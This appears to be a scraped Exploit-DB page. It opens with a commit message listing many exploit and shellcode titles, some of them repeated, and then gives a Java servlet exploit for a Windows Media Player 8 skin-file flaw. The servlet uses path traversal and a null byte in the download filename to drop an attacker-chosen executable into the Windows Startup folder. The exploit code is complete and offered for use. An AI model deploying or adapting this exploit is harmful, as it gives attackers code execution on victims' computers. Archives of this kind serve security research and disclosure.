880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
74 lines
No EOL
2.7 KiB
Java
74 lines
No EOL
2.7 KiB
Java
source: https://www.securityfocus.com/bid/7517/info
|
|
|
|
Windows Media Player is vulnerable to code execution through skin files. WMP does not properly validate URLs that are passed to initiate a skin file download and installation. This could allow a malicious file advertised as a skin file to be downloaded to a known location and executed through some other means.
|
|
|
|
import javax.servlet.http.HttpServlet;
|
|
import javax.servlet.http.HttpServletRequest;
|
|
import javax.servlet.http.HttpServletResponse;
|
|
import javax.servlet.ServletException;
|
|
import javax.servlet.ServletOutputStream;
|
|
import java.io.*;
|
|
|
|
/**
|
|
*
|
|
* Microsoft media player 8 Exploit for windows XP English and Dutch versions
|
|
*
|
|
* It will drop a file in the startup folder
|
|
*
|
|
* modify web.xml to change what will be uploaded
|
|
*
|
|
* @author Jelmer Kuperus
|
|
*
|
|
*/
|
|
|
|
public class MediaPlayerExploit extends HttpServlet {
|
|
|
|
private static final int BUFFER_SIZE = 1024;
|
|
|
|
private static final String[] paths = new String[] {
|
|
"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English
|
|
"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch
|
|
};
|
|
|
|
private String payload;
|
|
|
|
|
|
public void init() throws ServletException {
|
|
payload = getInitParameter("executable");
|
|
}
|
|
|
|
public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
|
|
|
|
int language = 0; // default to english
|
|
|
|
try {
|
|
language = Integer.parseInt(request.getParameter("language"));
|
|
} catch (NumberFormatException ignored) {}
|
|
|
|
String path = paths[language];
|
|
|
|
File file = new File(payload);
|
|
|
|
ServletOutputStream sos = response.getOutputStream();
|
|
|
|
response.setContentType("application/download");
|
|
response.setHeader("Content-Disposition","filename=" + path + file.getName() + "%00.wmz");
|
|
|
|
BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file));
|
|
BufferedOutputStream bos = new BufferedOutputStream(sos);
|
|
|
|
byte buffer[] = new byte[BUFFER_SIZE];
|
|
|
|
int datalength = 0;
|
|
while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) {
|
|
bos.write(buffer,0,datalength);
|
|
}
|
|
bis.close();
|
|
bos.close();
|
|
}
|
|
|
|
public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
|
|
doGet(request, response);
|
|
}
|
|
|
|
} |